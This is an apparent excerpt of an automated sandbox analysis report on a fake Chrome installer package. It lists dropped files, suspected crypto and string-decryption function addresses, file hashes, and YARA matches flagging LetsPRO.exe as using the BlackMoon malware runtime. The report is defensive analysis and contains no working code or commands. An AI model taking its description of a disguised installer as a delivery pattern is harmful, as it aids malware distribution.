Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Windows\SystemTemp\GUMD96D.tmp
Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIB404.tmp Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_004012C0 4_2_004012C0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36EE0 4_2_03F36EE0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36C50 4_2_03F36C50
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F48381 4_2_03F48381
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F4E341 4_2_03F4E341
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F4EA1D 4_2_03F4EA1D
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F4F9FF 4_2_03F4F9FF
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F38900 4_2_03F38900
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F4D89F 4_2_03F4D89F
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C966EF8 5_2_6C966EF8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C906E64 5_2_6C906E64
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C906E68 5_2_6C906E68
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C96E8D1 5_2_6C96E8D1
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9968FF 5_2_6C9968FF
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C920959 5_2_6C920959
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C980A15 5_2_6C980A15
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C93EB8A 5_2_6C93EB8A
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9084A8 5_2_6C9084A8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9145EE 5_2_6C9145EE
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C8F21F0 5_2_6C8F21F0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9082CB 5_2_6C9082CB
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94A2E7 5_2_6C94A2E7
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C90A21D 5_2_6C90A21D
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C964239 5_2_6C964239
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C96238D 5_2_6C96238D
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9083DB 5_2_6C9083DB
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C988320 5_2_6C988320
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C909CCE 5_2_6C909CCE
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C997C2A 5_2_6C997C2A
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C903DF1 5_2_6C903DF1
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C981DEF 5_2_6C981DEF
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C907D60 5_2_6C907D60
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C905E60 5_2_6C905E60
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94DFA9 5_2_6C94DFA9
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C96B803 5_2_6C96B803
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C98D854 5_2_6C98D854
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C96F99A 5_2_6C96F99A
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C969957 5_2_6C969957
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94DAA8 5_2_6C94DAA8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C983A68 5_2_6C983A68
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C991BE0 5_2_6C991BE0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C903B5D 5_2_6C903B5D
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C96D51B 5_2_6C96D51B
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94D56F 5_2_6C94D56F
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C907601 5_2_6C907601
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C90362A 5_2_6C90362A
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9997A7 5_2_6C9997A7
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9057D5 5_2_6C9057D5
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C909709 5_2_6C909709
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C91913E 5_2_6C91913E
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C96329A 5_2_6C96329A
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C907250 5_2_6C907250
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C96524D 5_2_6C96524D
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C999395 5_2_6C999395
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00267897 8_2_00267897
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00263929 8_2_00263929
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025A95F 8_2_0025A95F
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025B18B 8_2_0025B18B
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00257B91 8_2_00257B91
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025AC09 8_2_0025AC09
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025A540 8_2_0025A540
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00262D55 8_2_00262D55
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025A5ED 8_2_0025A5ED
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025AED0 8_2_0025AED0
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00027834 16_2_00027834
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001B144 16_2_0001B144
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00020166 16_2_00020166
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00027218 16_2_00027218
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00027AFB 16_2_00027AFB
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00022C78 16_2_00022C78
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00014482 16_2_00014482
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_000264EE 16_2_000264EE
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0002758A 16_2_0002758A
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00027DB6 16_2_00027DB6
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_000227F0 16_2_000227F0
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00128CF0 30_2_00128CF0
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00133E2B 30_2_00133E2B
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00128A46 30_2_00128A46
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00129272 30_2_00129272
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_001286D4 30_2_001286D4
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00128FB7 30_2_00128FB7
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCEACD2 30_2_6CCEACD2
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD12D5E 30_2_6CD12D5E
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDF6E38 30_2_6CDF6E38
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCFE5E6 30_2_6CCFE5E6
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDF256E 30_2_6CDF256E
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDAFDB3 30_2_6CDAFDB3
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD07EEA 30_2_6CD07EEA
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCFFBB2 30_2_6CCFFBB2
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD132F5 30_2_6CD132F5
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCF72B8 30_2_6CCF72B8
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCDF270 30_2_6CCDF270
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDDB340 30_2_6CDDB340
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCE7319 30_2_6CCE7319
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDB0C36 30_2_6CDB0C36
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDE0D9B 30_2_6CDE0D9B
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCF853A 30_2_6CCF853A
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDC03ED 30_2_6CDC03ED
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDB1CD3 30_2_6CDB1CD3
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDD994A 30_2_6CDD994A
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD0D965 30_2_6CD0D965
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDE9A80 30_2_6CDE9A80
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD0DB65 30_2_6CD0DB65
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll CD28DAEDA3C8731030E2077E6ECCBB609E2098919B05FF310BEF8DCE1DCE2D8D
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll 25D1CC5BE93C7A0B58855AD1F4C9DF3CFB9EC87E5DC13DB85B147B1951AC6FA8
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe 8FE2226E8BEC5A45D4B819359192AB92446B54859BF8877573AB7A3C8B4ADA76
Found potential string decryption / allocating functions
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CDDCA63 appears 43 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CD36E90 appears 37 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CC96E44 appears 174 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CC94253 appears 195 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CC970FF appears 39 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 00127A10 appears 33 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CDD6348 appears 315 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CC9F306 appears 60 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CDD6C30 appears 42 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CCA6E8C appears 77 times
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: String function: 6CC9F2DC appears 54 times
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: String function: 00015960 appears 33 times
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: String function: 6C900980 appears 151 times
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: String function: 6C90B6EA appears 61 times
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: String function: 6C90A495 appears 38 times
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: String function: 6C900964 appears 73 times
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: String function: 00258C30 appears 40 times
PE file contains executable resources (Code or Archives)
Source: goopdateres_ca.dll.16.dr Static PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.114
Source: goopdateres_fil.dll.16.dr Static PE information: Resource name: RT_STRING type: VAX COFF executable, sections 80, created Wed Mar 25 10:31:05 1970, not stripped, version 108
Source: goopdateres_hu.dll.16.dr Static PE information: Resource name: RT_STRING type: MIPSEL MIPS-II ECOFF executable not stripped - version 0.101
Source: goopdateres_ms.dll.16.dr Static PE information: Resource name: RT_STRING type: 370 sysV executable not stripped
Source: goopdateres_tr.dll.16.dr Static PE information: Resource name: RT_STRING type: 370 XA sysV pure executable not stripped
Source: goopdateres_vi.dll.16.dr Static PE information: Resource name: RT_STRING type: iAPX 286 executable small model (COFF) not stripped
Source: goopdateres_ca.dll.30.dr Static PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.114
Source: goopdateres_fil.dll.30.dr Static PE information: Resource name: RT_STRING type: VAX COFF executable, sections 80, created Wed Mar 25 10:31:05 1970, not stripped, version 108
Source: goopdateres_hu.dll.30.dr Static PE information: Resource name: RT_STRING type: MIPSEL MIPS-II ECOFF executable not stripped - version 0.101
Source: goopdateres_ms.dll.30.dr Static PE information: Resource name: RT_STRING type: 370 sysV executable not stripped
Source: goopdateres_tr.dll.30.dr Static PE information: Resource name: RT_STRING type: 370 XA sysV pure executable not stripped
Source: goopdateres_vi.dll.30.dr Static PE information: Resource name: RT_STRING type: iAPX 286 executable small model (COFF) not stripped
Sample file is different than original file name gathered from version info
Source: sutup-Chrome.13.26.x64.msi Binary or memory string: OriginalFilenameaischeduler.dllF vs sutup-Chrome.13.26.x64.msi
Source: sutup-Chrome.13.26.x64.msi Binary or memory string: OriginalFilenameShortcutFlags.dllF vs sutup-Chrome.13.26.x64.msi
Yara signature match
Source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
